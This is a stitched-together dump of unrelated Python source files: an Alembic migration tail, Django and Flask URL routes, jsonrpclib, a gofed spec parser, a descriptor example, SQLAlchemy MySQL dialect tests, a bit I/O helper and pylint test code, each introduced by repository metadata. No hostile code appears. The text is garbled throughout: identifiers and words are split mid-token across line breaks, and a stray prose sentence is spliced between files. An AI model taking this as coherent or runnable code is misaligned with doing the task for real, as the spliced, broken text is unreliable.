sa.Column('device_driver', sa.Enum( 'zun', name='allowed_device_drivers'), nullable=False), sa.Column('reservable', sa.Boolean(), server_default=sa.text('true'), nullable=False), sa.PrimaryKeyConstraint('id') ) op.create_table('device_extra_capabilities', sa.Column('created_at', sa.DateTime(), nullable=True), sa.Column('updated_at', sa.DateTime(), nullable=True), sa.Column('id', sa.String(length=36), nullable=False), sa.Column('device_id', sa.String( length=36), nullable=False), sa.Column('capability_id', sa.String( length=255), nullable=False), sa.Column('capability_value', sa.Text().with_variant( mysql.MEDIUMTEXT(), 'mysql'), nullable=False), sa.ForeignKeyConstraint( ['capability_id'], ['extra_capabilities.id'], ), sa.ForeignKeyConstraint(['device_id'], ['devices.id'], ), sa.PrimaryKeyConstraint('id') ) op.create_table('device_allocations', sa.Column('created_at', sa.DateTime(), nullable=True), sa.Column('updated_at', sa.DateTime(), nullable=True), sa.Column('deleted_at', sa.DateTime(), nullable=True), sa.Column('deleted', sa.String(length=36), nullable=True), sa.Column('id', sa.String(length=36), nullable=False), sa.Column('device_id', sa.String( length=36), nullable=True), sa.Column('reservation_id', sa.String( length=36), nullable=True), sa.ForeignKeyConstraint(['device_id'], ['devices.id'], ), sa.ForeignKeyConstraint(['reservation_id'], [ 'reservations.id'], ), sa.PrimaryKeyConstraint('id') ) op.create_table('device_reservations', sa.Column('created_at', sa.DateTime(), nullable=True), sa.Column('updated_at', sa.DateTime(), nullable=True), sa.Column('deleted_at', sa.DateTime(), nullable=True), sa.Column('deleted', sa.String(length=36), nullable=True), sa.Column('id', sa.String(length=36), nullable=False), sa.Column('reservation_id', sa.String( length=36), nullable=True), sa.Column('count_range', sa.String( length=36), nullable=True), sa.Column('resource_properties', sa.Text().with_variant( mysql.MEDIUMTEXT(), 'mysql'), nullable=True), sa.Column('before_end', sa.String( length=36), nullable=True), sa.ForeignKeyConstraint(['reservation_id'], [ 'reservations.id'], ), sa.PrimaryKeyConstraint('id') ) op.alter_column('instance_reservations', 'affinity', 
existing_type=mysql.TINYINT(display_width=1), nullable=False) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.alter
_column('instance_reservations', 'affinity', existing_type=mysql.TINYINT(display_width=1),
nullable=True) op.drop_table('device_reservations') op.drop_table('device_allocations') op.drop_table('device_extra_capabilities') op.drop_table('devices') # ### end Alembic commands ###
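A sketch of applying this revision programmatically through Alembic's command API; the alembic.ini path is an assumption, and running `alembic upgrade 42c7fd6e792e` from the CLI is the equivalent:

from alembic import command
from alembic.config import Config

cfg = Config("alembic.ini")           # assumed project config path
command.upgrade(cfg, "42c7fd6e792e")  # apply this revision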
timokoola/okrest
okrest/okrest/urls.py
Python
apache-2.0
449
0.008909
from django.conf.urls import patterns, include, url from django.contrib import admin
from api import views admin
.autodiscover() from rest_framework.routers import DefaultRouter router = DefaultRouter() router.register(r'headings', views.HeadingViewSet) router.register(r'users', views.UserViewSet) urlpatterns = patterns('', url(r'^', include(router.urls)), url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')) )
pymedusa/Medusa
ext/jsonrpclib/jsonrpc.py
Python
gpl-3.0
43,868
0.000046
#!/usr/bin/python # -- Content-Encoding: UTF-8 -- """ ============================ JSONRPC Library (jsonrpclib) ============================ This library is a JSON-RPC v.2 (proposed) implementation which follows the xmlrpclib API for portability between clients. It uses the same Server / ServerProxy, loads, dumps, etc. syntax, while providing features not present in XML-RPC like: * Keyword arguments * Notifications * Versioning * Batches and batch notifications Eventually, I'll add a SimpleXMLRPCServer compatible library, and other things to tie the thing off nicely
. :) For a quick-start, just open a console and type the following, replacing the server address, method, and parameters appropriately. >>> import jsonrpclib >>> server = jsonrpclib.Server('http://localhost:8181') >>>
server.add(5, 6) 11 >>> server._notify.add(5, 6) >>> batch = jsonrpclib.MultiCall(server) >>> batch.add(3, 50) >>> batch.add(2, 3) >>> batch._notify.add(3, 5) >>> batch() [53, 5] See https://github.com/tcalmant/jsonrpclib for more info. :authors: Josh Marshall, Thomas Calmant :copyright: Copyright 2020, Thomas Calmant :license: Apache License 2.0 :version: 0.4.2 .. Copyright 2020 Thomas Calmant Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ # Standard library import contextlib import logging import os import socket import sys import uuid try: # Python 3 # pylint: disable=F0401,E0611 from http.client import HTTPConnection from urllib.parse import urlparse from xmlrpc.client import Transport as XMLTransport from xmlrpc.client import SafeTransport as XMLSafeTransport from xmlrpc.client import ServerProxy as XMLServerProxy from xmlrpc.client import _Method as XML_Method except ImportError: # Python 2 # pylint: disable=F0401,E0611 from httplib import HTTPConnection # type: ignore from urlparse import urlparse # type: ignore from xmlrpclib import Transport as XMLTransport # type: ignore from xmlrpclib import SafeTransport as XMLSafeTransport # type: ignore from xmlrpclib import ServerProxy as XMLServerProxy # type: ignore from xmlrpclib import _Method as XML_Method # type: ignore try: # Check GZip support import gzip except ImportError: # Python can be built without zlib/gzip support # pylint: disable=C0103 gzip = None # type: ignore # Library includes import jsonrpclib.config import jsonrpclib.jsonclass as jsonclass import jsonrpclib.utils as utils # ------------------------------------------------------------------------------ # Module version __version_info__ = (0, 4, 2) __version__ = ".".join(str(x) for x in __version_info__) # Documentation strings format __docformat__ = "restructuredtext en" # Create the logger _logger = logging.getLogger(__name__) # ------------------------------------------------------------------------------ # JSON library import try: # pylint: disable=F0401,E0611 # Using cjson import cjson # type: ignore _logger.debug("Using cjson as JSON library") # Declare cjson methods def jdumps(obj, encoding="utf-8"): # pylint: disable=unused-argument """ Serializes ``obj`` to a JSON formatted string, using cjson. """ return cjson.encode(obj) def jloads(json_string): """ Deserializes ``json_string`` (a string containing a JSON document) to a Python object, using cjson. """ return cjson.decode(json_string) except ImportError: # pylint: disable=F0401,E0611 # Use json or simplejson try: import json _logger.debug("Using json as JSON library") except ImportError: try: import simplejson as json # type: ignore _logger.debug("Using simplejson as JSON library") except ImportError: _logger.error("No supported JSON library found") raise ImportError( "You must have the cjson, json, or simplejson " "module(s) available." ) # Declare json methods if sys.version_info[0] < 3: def jdumps(obj, encoding="utf-8"): """ Serializes ``obj`` to a JSON formatted string. 
""" # Python 2 (explicit encoding) return json.dumps(obj, encoding=encoding) else: # Python 3 def jdumps(obj, encoding="utf-8"): # pylint: disable=unused-argument """ Serializes ``obj`` to a JSON formatted string. """ # Python 3 (the encoding parameter has been removed) return json.dumps(obj) def jloads(json_string): """ Deserializes ``json_string`` (a string containing a JSON document) to a Python object. """ return json.loads(json_string) # ------------------------------------------------------------------------------ # XMLRPClib re-implementations class ProtocolError(Exception): """ JSON-RPC error ProtocolError.args[0] can be: * an error message (string) * a (code, message) tuple """ class AppError(ProtocolError): """ Application error: the error code is not in the pre-defined ones AppError.args[0][0]: Error code AppError.args[0][1]: Error message or trace AppError.args[0][2]: Associated data """ def data(self): """ Retrieves the value found in the 'data' entry of the error, or None :return: The data associated to the error, or None """ # Don't know why the pylint error shows up return self.args[0][2] # pylint: disable=unsubscriptable-object class TransportError(ProtocolError): """ Transport error: a specialized protocol error """ def __init__(self, url, errcode, errmsg, msg): """ :param url: Target URL :param errcode: HTTP error code :param errmsg: HTTP error code description :param msg: Exception message """ ProtocolError.__init__(self, url, errcode, errmsg, msg) self.url = url self.errcode = errcode self.errmsg = errmsg self.msg = msg def __repr__(self): return "<{} for {}: {} {}>".format( type(self).__name__, self.url, self.errcode, self.errmsg ) class JSONParser(object): """ Default JSON parser """ def __init__(self, target): """ Associates the target loader to the parser :param target: a JSONTarget instance """ self.target = target def feed(self, data): """ Feeds the associated target with the given data """ self.target.feed(data) @staticmethod def close(): """ Does nothing """ class JSONTarget(object): """ Unmarshalls stream data to a string """ def __init__(self): """ Sets up the unmarshaller """ self.data = [] def feed(self, data): """ Stores the given raw data into a buffer """ # Store raw data as it might not contain whole wide-character self.data.append(data) def close(self): """ Unmarshalls the buffered data """ if not self.data: return "" else: # Use type to have a valid join (str vs. bytes) data = type(self.data[0])().join(self.data) try: # Convert the whole final string data = utils.from_bytes(data) except (TypeError, ValueError): # Try a pass-through pass return data
ingvagabund/gofed
modules/RemoteSpecParser.py
Python
gpl-2.0
2,663
0.015396
# #################################################################### # gofed - set of tools to automize packaging of golang devel codes # Copyright (C) 2014 Jan Chaloupka, jchaloup@redhat.com # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; eith
er version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# ####################################################################

###################################################################
# TODO:
# [ ] - detect more import paths/sources in spec file?
# [ ] - detect from %files every build, analyze its content (downloading it from koji by detecting its name
#       from spec file => no koji latest-builds, which packages/builds are no arch, which are arch specific (el6 beast)
# [ ] - all provides of source code import must in a form golang(import_path/...)
# [ ] - what files/provides are optional, which should not be in provides (test files, example, ...)
# [ ] - golang imports of examples are optional
###################################################################

import tempfile
from Utils import runCommand
from SpecParser import SpecParser
from Base import Base

class RemoteSpecParser(Base):

    def __init__(self, branch, package):
        Base.__init__(self)
        self.branch = branch
        self.package = package
        self.sp_obj = None

    def parse(self):
        f = tempfile.NamedTemporaryFile(delete=True)
        cmd_str = "curl http://pkgs.fedoraproject.org/cgit/rpms/%s.git/plain/%s.spec > %s"
        runCommand(cmd_str % (self.package, self.package, f.name))
        self.sp_obj = SpecParser(f.name)
        if not self.sp_obj.parse():
            self.err = self.sp_obj.getError()
            f.close()
            return False
        f.close()
        return True

    def getProvides(self):
        """Fetch a spec file from pkgdb and get provides from all its [sub]packages"""
        if self.sp_obj is None:
            return {}
        return self.sp_obj.getProvides()

    def getPackageCommits(self):
        if self.sp_obj is None:
            return ""
        return self.sp_obj.getMacro("commit")

    def getPkgURL(self):
        if self.sp_obj is None:
            return ""
        return self.sp_obj.getTag("url")
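As a hedged sketch of the fetch-into-a-temporary-file pattern that parse() implements above, here is the same idea using only the standard library (urllib2 in place of the shelled-out curl; the helper name is an assumption, not gofed code):

import tempfile
import urllib2

def fetch_spec(url):
    # Download into a NamedTemporaryFile so a parser can read it by name,
    # as RemoteSpecParser.parse() does with SpecParser(f.name).
    f = tempfile.NamedTemporaryFile(delete=True)
    f.write(urllib2.urlopen(url).read())
    f.flush()  # make the bytes visible before anyone opens f.name
    return f   # caller keeps the handle alive; the file vanishes on close()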
gaomeng1900/SQIP-py
sqip/dashboard/dashboard.py
Python
cc0-1.0
548
0.018248
#!/usr/bin/env python #-*-coding:utf-8-*- # # @author Meng G. # 2016-03-28 restructed from sqip.config import * from sqip.libs import * dashboard = Blueprint('dashboard', __name__,
template_folder='templates') @base.route('/admin/login' , methods=['GET']) @union_bug
def admin_login():
    template = env.get_template('login.html')
    return template.render()

@base.route('/admin', methods=['GET'])
@base.route('/admin/<path:path>', methods=['GET'])
@union_bug
def admin(path=None):
    template = env.get_template('index.html')
    return template.render()
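A hedged sketch of how a blueprint like the one above is normally mounted on an application; the app module and URL prefix are assumptions, not taken from sqip:

from flask import Flask
from sqip.dashboard.dashboard import dashboard

app = Flask(__name__)
app.register_blueprint(dashboard, url_prefix='/dashboard')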
wuqize/FluentPython
chapter20/bulkfood/bulkfood_v3.py
Python
lgpl-3.0
720
0.005556
#coding=utf-8 class Quantity:
__counter = 0 def __init__(self): cls = self.__class__ prefix = cls.__name__ index = cls.__counter self.storage_name = '_{}#{}'.forma
t(prefix, index)
        cls.__counter += 1

    def __get__(self, instance, owner):
        # Without __get__, reading the managed attribute would return the
        # descriptor object itself, because the storage name differs from it.
        return getattr(instance, self.storage_name)

    def __set__(self, instance, value):
        if value > 0:
            instance.__dict__[self.storage_name] = value
        else:
            raise ValueError('value must be > 0')


class LineItem:
    weight = Quantity()
    price = Quantity()

    def __init__(self, description, weight, price):
        self.description = description
        self.weight = weight
        self.price = price

    def subtotal(self):
        return self.weight * self.price
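A hedged usage sketch for the Quantity descriptor above; the nutmeg values are illustrative:

nutmeg = LineItem('Moluccan nutmeg', 8, 13.95)
print(nutmeg.subtotal())     # 111.6, reads go through Quantity.__get__
print(sorted(vars(nutmeg)))  # ['_Quantity#0', '_Quantity#1', 'description']
try:
    nutmeg.weight = 0        # rejected by Quantity.__set__
except ValueError as exc:
    print(exc)               # value must be > 0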
graingert/sqlalchemy
test/dialect/mysql/test_dialect.py
Python
mit
14,932
0
# coding: utf-8 import datetime from sqlalchemy import bindparam from sqlalchemy import Column from sqlalchemy import DateTime from sqlalchemy import func from sqlalchemy import Integer from sqlalchemy import MetaData from sqlalchemy import Table from sqlalchemy import testing from sqlalchemy.dialects import mysql from sqlalchemy.engine.url import make_url from sqlalchemy.testing import engines from sqlalchemy.testing import eq_ from sqlalchemy.testing import expect_warnings from sqlalchemy.testing import fixtures from sqlalchemy.testing import mock from ...engine import test_execute class DialectTest(fixtures.TestBase): __backend__ = True __only_on__ = "mysql" @testing.combinations( (None, "cONnection was kILLEd", "InternalError", "pymysql", True), (None, "cONnection aLREady closed", "InternalError", "pymysql", True), (None, "something broke", "InternalError", "pymysql", False), (2006, "foo", "OperationalError", "mysqldb", True), (2006, "foo", "OperationalError", "pymysql", True), (2007, "foo", "OperationalError", "mysqldb", False), (2007, "foo", "OperationalError", "pymysql", False), ) def test_is_disconnect( self, arg0, message, exc_cls_name, dialect_name, is_disconnect ): class Error(Exception): pass dbapi = mock.Mock() dbapi.Error = Error dbapi.ProgrammingError = type("ProgrammingError", (Error,), {}) dbapi.OperationalError = type("OperationalError", (Error,), {}) dbapi.InterfaceError = type("InterfaceError", (Error,), {}) dbapi.InternalError = type("InternalError", (Error,), {}) dialect = getattr(mysql, dialect_name).dialect(dbapi=dbapi) error = getattr(dbapi, exc_cls_name)(arg0, message) eq_(dialect.is_disconnect(error, None, None), is_disconnect) def test_ssl_arguments_mysqldb(self): from sqlalchemy.dialects.mysql import mysqldb dialect = mysqldb.dialect() self._test_ssl_arguments(dialect) def test_ssl_arguments_oursql(self): from s
qlalchemy.dialects.mysql import oursql dialect = oursql.dialect() self._test_ssl_arguments(dialect) def _t
est_ssl_arguments(self, dialect): kwarg = dialect.create_connect_args( make_url( "mysql://scott:tiger@localhost:3306/test" "?ssl_ca=/ca.pem&ssl_cert=/cert.pem&ssl_key=/key.pem" ) )[1] # args that differ among mysqldb and oursql for k in ("use_unicode", "found_rows", "client_flag"): kwarg.pop(k, None) eq_( kwarg, { "passwd": "tiger", "db": "test", "ssl": { "ca": "/ca.pem", "cert": "/cert.pem", "key": "/key.pem", }, "host": "localhost", "user": "scott", "port": 3306, }, ) @testing.combinations( ("compress", True), ("connect_timeout", 30), ("read_timeout", 30), ("write_timeout", 30), ("client_flag", 1234), ("local_infile", 1234), ("use_unicode", False), ("charset", "hello"), ) def test_normal_arguments_mysqldb(self, kwarg, value): from sqlalchemy.dialects.mysql import mysqldb dialect = mysqldb.dialect() connect_args = dialect.create_connect_args( make_url( "mysql://scott:tiger@localhost:3306/test" "?%s=%s" % (kwarg, value) ) ) eq_(connect_args[1][kwarg], value) def test_mysqlconnector_buffered_arg(self): from sqlalchemy.dialects.mysql import mysqlconnector dialect = mysqlconnector.dialect() kw = dialect.create_connect_args( make_url("mysql+mysqlconnector://u:p@host/db?buffered=true") )[1] eq_(kw["buffered"], True) kw = dialect.create_connect_args( make_url("mysql+mysqlconnector://u:p@host/db?buffered=false") )[1] eq_(kw["buffered"], False) kw = dialect.create_connect_args( make_url("mysql+mysqlconnector://u:p@host/db") )[1] eq_(kw["buffered"], True) def test_mysqlconnector_raise_on_warnings_arg(self): from sqlalchemy.dialects.mysql import mysqlconnector dialect = mysqlconnector.dialect() kw = dialect.create_connect_args( make_url( "mysql+mysqlconnector://u:p@host/db?raise_on_warnings=true" ) )[1] eq_(kw["raise_on_warnings"], True) kw = dialect.create_connect_args( make_url( "mysql+mysqlconnector://u:p@host/db?raise_on_warnings=false" ) )[1] eq_(kw["raise_on_warnings"], False) kw = dialect.create_connect_args( make_url("mysql+mysqlconnector://u:p@host/db") )[1] assert "raise_on_warnings" not in kw @testing.only_on("mysql") def test_random_arg(self): dialect = testing.db.dialect kw = dialect.create_connect_args( make_url("mysql://u:p@host/db?foo=true") )[1] eq_(kw["foo"], "true") @testing.only_on("mysql") @testing.skip_if("mysql+mysqlconnector", "totally broken for the moment") @testing.fails_on("mysql+oursql", "unsupported") def test_special_encodings(self): for enc in ["utf8mb4", "utf8"]: eng = engines.testing_engine( options={"connect_args": {"charset": enc, "use_unicode": 0}} ) conn = eng.connect() eq_(conn.dialect._connection_charset, enc) def test_no_show_variables(self): from sqlalchemy.testing import mock engine = engines.testing_engine() def my_execute(self, statement, *args, **kw): if statement.startswith("SHOW VARIABLES"): statement = "SELECT 1 FROM DUAL WHERE 1=0" return real_exec(self, statement, *args, **kw) real_exec = engine._connection_cls.exec_driver_sql with mock.patch.object( engine._connection_cls, "exec_driver_sql", my_execute ): with expect_warnings( "Could not retrieve SQL_MODE; please ensure the " "MySQL user has permissions to SHOW VARIABLES" ): engine.connect() def test_no_default_isolation_level(self): from sqlalchemy.testing import mock engine = engines.testing_engine() real_isolation_level = testing.db.dialect.get_isolation_level def fake_isolation_level(connection): connection = mock.Mock( cursor=mock.Mock( return_value=mock.Mock( fetchone=mock.Mock(return_value=None) ) ) ) return real_isolation_level(connection) with mock.patch.object( engine.dialect, 
"get_isolation_level", fake_isolation_level ): with expect_warnings( "Could not retrieve transaction isolation level for MySQL " "connection." ): engine.connect() def test_autocommit_isolation_level(self): c = testing.db.connect().execution_options( isolation_level="AUTOCOMMIT" ) assert c.exec_driver_sql("SELECT @@autocommit;").scalar() c = c.execution_options(isolation_level="READ COMMITTED") assert not c.exec_driver_sql("SELECT @@autocommit;").scalar() def test_isolation_level(self): values = [ "READ UNCOMMITTED", "READ COMMITTED", "REPEATABLE READ", "SERIALIZABLE", ] for value in values: c = testing.db.connect().execution_options(isolation_level=value) eq_(testing.db.dialect.get_isolation_level(c.connection), value) class ParseVersionTest(fixtures.TestBase): @testing.combinations( ((10, 2, 7), "10.2.7-Ma
aheadley/python-naabal
naabal/util/bitio.py
Python
mit
2,763
0.002533
# @source http://rosettacode.org/wiki/Bitwise_IO#Python # @license http://www.gnu.org/licenses/fdl-1.2.html import logging logger = logging.getLogger('naabal.util.bitio') class BitIO(object): BITS_IN_BYTE = 8 DEFAULT_MASK = 1 << (BITS_IN_BYTE - 1) # 0x80 def __init__(self, handle): self._data_buffer = handle self._bit_buffer = 0x00 self._bit_mask = self.DEFAULT_MASK self._bit_idx = 0 def __enter__(self): return self def __exit__(self, type, value, tb): pass @property def index(self): return self._bit_idx class BitWriter(BitIO): def __exit__(self, type, value, tb): self.flush() def write_bit(self, bit): if bit: self._bit_buffer |= self._bit_mask self._bit_mask = self._bit_mask >> 1 if self._bit_mask == 0: self._flush_bit_buffer() self._reset_state() def write_bits(self, value, bit_count): mask = 1 << (bit_count - 1) while mask != 0: if mask & value: self._bit_buffer |= self._bit_mask self._bit_mask = self._bit_mask >> 1 if self._bit_mask == 0: self._flush_bit_buffer() self._reset_state() mask = mask >> 1 def flush(self): if self._bit_mask != self.DEFAULT_MASK: self._flush_bit_buffer() self._reset_state() return self._bit_idx def _flush_bit_buffer(self): self._data_buffer.write(chr(self._bit_buffer)) self._bit_idx += 1 def _reset_state(self): self._bit_buffer = 0x00 self._bit_mask = self.DEFAULT_MASK class BitReader(BitIO): def read_bit(self): if self._bit_mask == self.DEFAULT_MASK: self._load_bit_buffer() value = self._bit_buffer & self._bit_mask self._bit_mask = self._bit_mask >> 1 if self._bit_mask == 0: self._bit_mask = self.DEFAULT_MASK return 1 if value else 0 def read_bits(self, bit_count): mask = 1 << (bit_count - 1) bits_value = 0x00 while mask != 0: if self._bit_mask == self.DEFAULT_MASK: self._load_bit_buffer() if self._bit_buffer & self._bit_mask: bits_value |= mask mask = mask >> 1 self._bit_mask = self._bit_mask >> 1 if self._bit_mask == 0: self._bit_mask = self.DEFAULT_M
ASK return bits_value def _load_bit_buffer(self): c = self._data_buffer.r
ead(1) if c: self._bit_buffer = ord(c) self._bit_idx += 1 else: raise IOError('Attempted to read past EOF')
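A round-trip sketch for the classes above (Python 3 here; an in-memory text buffer stands in for the byte stream, since the writer emits one chr() per byte):

import io

buf = io.StringIO()
with BitWriter(buf) as writer:   # __exit__ flushes the partial last byte
    writer.write_bits(0b101, 3)  # three bits, MSB first
    writer.write_bit(1)          # one more bit
buf.seek(0)
reader = BitReader(buf)
print(reader.read_bits(3))  # 5
print(reader.read_bit())    # 1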
dbbhattacharya/kitsune
vendor/packages/pylint/test/test_func.py
Python
bsd-3-clause
7,955
0.007291
# Copyright (c) 2003-2008 LOGILAB S.A. (Paris, FRANCE). # http://www.logilab.fr/ -- mailto:contact@logilab.fr # # This program is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License as published by the Free Software # Foundation; either version 2 of the License, or (at your option) any later # version. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along with # this program; if not, write to the Free Software Foundation, Inc., # 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. """functional/non regression tests for pylint""" import unittest import sys import re import new from os import linesep from os.path import exists from logilab.common import testlib from utils import get_tests_info, fix_path, TestReporter from logilab.astng import MANAGER from pylint.lint import PyLinter from pylint import checkers test_reporter = TestReporter() linter = PyLinter() linter.set_reporter(test_reporter) linter.config.persistent = 0 checkers.initialize(linter) linter.global_set_option('required-attributes', ('__revision__',)) PY23 = sys.version_info >= (2, 3) PY24 = sys.version_info >= (2, 4) PY25 = sys.version_info >= (2, 5) if linesep != '\n': LINE_RGX = re.compile(linesep) def ulines(string): return LINE_RGX.sub('\n', string) else: def ulines(string): return string INFO_TEST_RGX = re.compile('^func_i\d\d\d\d$') def exception_str(ex): """function used to replace default __str__ method of exception instances""" return 'in %s\n:: %s' % (ex.file, ', '.join(ex.args)) class LintTestUsingModule(testlib.TestCase): DEFAULT_PACKAGE = 'input' package = DEFAULT_PACKAGE linter = linter module = None depends = None _TEST_TYPE = 'module' def shortDescription(self): values = { 'mode' : self._TEST_TYPE, 'input': self.module, 'pkg': self.package, 'cls': self.__class__.__name__} if self.package == self.DEFAULT_PACKAGE: msg = '%(mode)s test of input file "%(input)s" (%(cls)s)' else: msg = '%(mode)s test of input file "%(input)s" in "%(pkg)s" (%(cls)s)' return msg % values def test_functionality(self): tocheck = [self.package+'.'+self.module] if self.depends: tocheck += [self.package+'.%s' % name.replace('.py', '') for name, file in self.depends] self._test(tocheck) def _test(self, tocheck): if INFO_TEST_RGX.match(self.module): self.linter.enable_message_category('I') else: self.linter.disable_message_category('I') try: self.linter.check(tocheck) except Exception, ex: # need finalization to restore a correct sta
te self.linter.reporter.finalize() ex.file = tocheck ex.__str__ = new.instancemethod(exception_str, ex, None) raise if self.module.startswith('func_noerror_'): expected = '' else: output = open(self.output) expected = output.read().strip() output.close() got = self.linter.reporter.finalize().strip() try: self.assertLinesEquals(g
ot, expected) except Exception, ex: # doesn't work with py 2.5 #ex.file = tocheck #ex.__str__ = new.instancemethod(exception_str, ex, None) raise AssertionError('%s: %s' % (self.module, ex)), None, sys.exc_info()[-1] class LintTestUsingFile(LintTestUsingModule): _TEST_TYPE = 'file' def test_functionality(self): tocheck = [self.package+'/' + self.module + '.py'] if self.depends: tocheck += [self.package+'/%s' % name for name, file in self.depends] self._test(tocheck) class TestTests(testlib.TestCase): """check that all testable messages have been checked""" @testlib.tag('coverage') def test_exhaustivity(self): # skip fatal messages todo = [msgid for msgid in linter._messages.keys() if msgid[0] != 'F'] for msgid in test_reporter.message_ids.keys(): try: todo.remove(msgid) except ValueError: continue todo.sort() if PY25: self.assertEqual(todo, ['E0503', 'I0001']) elif PY23: self.assertEqual(todo, ['E0503', 'I0001']) else: # python < 2.3 self.assertEqual(todo, ['I0001']) #bycat = {} #for msgid in linter._messages.keys(): # bycat[msgid[0]] = bycat.setdefault(msgid[0], 0) + 1 #for cat, val in bycat.items(): # print '%s: %s' % (cat, val) #print 'total', sum(bycat.values()) # # on 2007/02/17: # # W: 48 # E: 42 # R: 15 # C: 13 # F: 7 # I: 5 # total 130 def make_tests(filter_rgx): """generate tests classes from test info return the list of generated test classes """ if filter_rgx: is_to_run = re.compile(filter_rgx).search else: is_to_run = lambda x: 1 tests = [] for module_file, messages_file in get_tests_info('func_', '.py') + [('nonexistant', 'messages/nonexistant.txt')]: # skip those tests with python >= 2.3 since py2.3 detects them by itself if PY23 and module_file == "func_unknown_encoding.py": #"func_nonascii_noencoding.py"): continue pyrestr = module_file.rsplit('_py', 1)[-1][:-3] if pyrestr.isdigit(): # '24', '25'... if sys.version_info < tuple([int(i) for i in pyrestr]): continue if not is_to_run(module_file): continue base = module_file.replace('func_', '').replace('.py', '') dependencies = get_tests_info(base, '.py') class LintTestUsingModuleTC(LintTestUsingModule): module = module_file.replace('.py', '') output = messages_file depends = dependencies or None tags = testlib.Tags(('generated','pylint_input_%s' % module)) tests.append(LintTestUsingModuleTC) if MODULES_ONLY: continue class LintTestUsingFileTC(LintTestUsingFile): module = module_file.replace('.py', '') output = exists(messages_file + '2') and (messages_file + '2') or messages_file depends = dependencies or None tags = testlib.Tags(('generated', 'pylint_input_%s' % module)) tests.append(LintTestUsingFileTC) ## # special test for f0003 ## module_file, messages_file in get_tests_info('func_f0003', '.pyc') ## class LintTestSubclass(LintTest): ## module = module_file.replace('.pyc', '') ## output = messages_file ## depends = dependencies or None ## tests.append(LintTestSubclass) class LintBuiltinModuleTest(LintTestUsingModule): output = 'messages/builtin_module.txt' module = 'sys' def test_functionality(self): self._test(['sys']) tests.append(LintBuiltinModuleTest) if not filter_rgx: # test all features are tested :) tests.append(TestTests) return tests FILTER_RGX = None MODULES_ONLY = False def suite(): return unittest.TestSuite([unittest.makeSuite(test) for test in make_tests(FILTER_RGX)]) if __name__=='__main__': if '-m' in sys.argv: MODULES_ONLY = True sys.argv.remove('-m') if len(sys.argv) > 1: FILTER_RGX = sys.argv[1] del sys.argv[1] testlib.unittest_main(defaultTest='suite')
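A standalone, hedged sketch of the class-generation trick that make_tests() relies on above; the module names are made up:

import unittest

def make_case(module_name):
    # Build one TestCase subclass per input module, as make_tests() does.
    class GeneratedTC(unittest.TestCase):
        module = module_name
        def test_module_name(self):
            self.assertTrue(self.module.startswith('func_'))
    GeneratedTC.__name__ = 'Lint_%s_TC' % module_name
    return GeneratedTC

suite = unittest.TestSuite(
    unittest.makeSuite(make_case(name)) for name in ['func_a', 'func_b'])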
rh-lab-q/conflab
wsgi/openshift/confla/urls.py
Python
gpl-3.0
6,136
0.008638
from django.conf.urls import url, include from django.conf.urls.static import static from django.conf import settings from django.contrib import admin from django.urls import path from confla import views app_name = "confla" urlpatterns = [ path('admin/', admin.site.urls), url(r'^$', views.IndexView.my_view, name='index'), url(r'add_rooms/$', views.AddRoomsView.view_form, name='add_rooms'), url(r'^events/popover/$', views.EventView.get_popover, name='eventPop'), url(r'^events/modal/$', views.EventEditView.event_modal, name='eventMod'), url(r'^login/$', views.LoginView.my_view, name='login'), url(r'^logout/$', views.LoginView.logout, name='logout'), url(r'^process/$', views.LoginView.auth_and_login, name='process_login'), url(r'^users/$', views.UserView.my_view, name='users'), url(r'^user/(?P<url_username>\w+)/profile/$', views.UserView.view_profile, name='profile'), url(r'^
user/(?P<url_username>\w+)/delete_mail/(?P<id>\d+)/', views.UserView.delete_ema
il, name='delete_email'), url(r'^user/(?P<url_username>\w+)/set_primary_mail/(?P<id>\d+)/', views.UserView.set_email_primary, name='set_primary_email'), url(r'^user/volunteer/$', views.VolunteerView.my_view, name='volunteer'), url(r'^register/$', views.RegisterView.user_register, name='register'), url(r'^reset_password/$', views.RegisterView.reset_password, name='reset_password'), url(r'^reset_password2/(?P<email_address>[^/]+)/(?P<token>[^/]+)$', views.RegisterView.reset_password2, name='reset_password2'), #url(r'^reg_talk/$', views.RegisterView.save_form_and_register, name='reg_talk'), #url(r'^notlogged/$', views.UserView.not_logged, name='notlogged'), url(r'^i18n/', include('django.conf.urls.i18n'), name='set_language'), url(r'^(?P<url_id>\w+)/$', views.AboutView.splash_view, name='splash'), url(r'^(?P<url_id>\w+)/cfp/$', views.CfpView.save_form_and_register, name='cfp'), url(r'^(?P<url_id>\w+)/about/$', views.AboutView.splash_view, name='about'), url(r'^(?P<url_id>\w+)/events/$', views.EventView.event_list, name='event_list'), url(r'^(?P<url_id>\w+)/places/$', views.PlacesView.osm, name='places'), url(r'^(?P<url_id>\w+)/about/(?P<page>\w+)$', views.PagesView.content, name='pages'), url(r'^(?P<url_id>\w+)/speakers/grid/$', views.UserView.speaker_grid, name='speaker_grid'), url(r'^(?P<url_id>\w+)/speakers/list/$', views.UserView.speaker_list, name='speaker_list'), url(r'^(?P<url_id>\w+)/sched/$', views.ScheduleView.my_view, name='schedule'), url(r'^(?P<url_id>\w+)/sched/list/$', views.ScheduleView.list_view, name='listsched'), url(r'^(?P<url_id>\w+)/sched/list/(?P<id>\d+)/$', views.ScheduleView.list_view, name='listschedTag'), url(r'^(?P<url_id>\w+)/config/$', views.RoomConfView.slot_view, name='conf_rooms'), 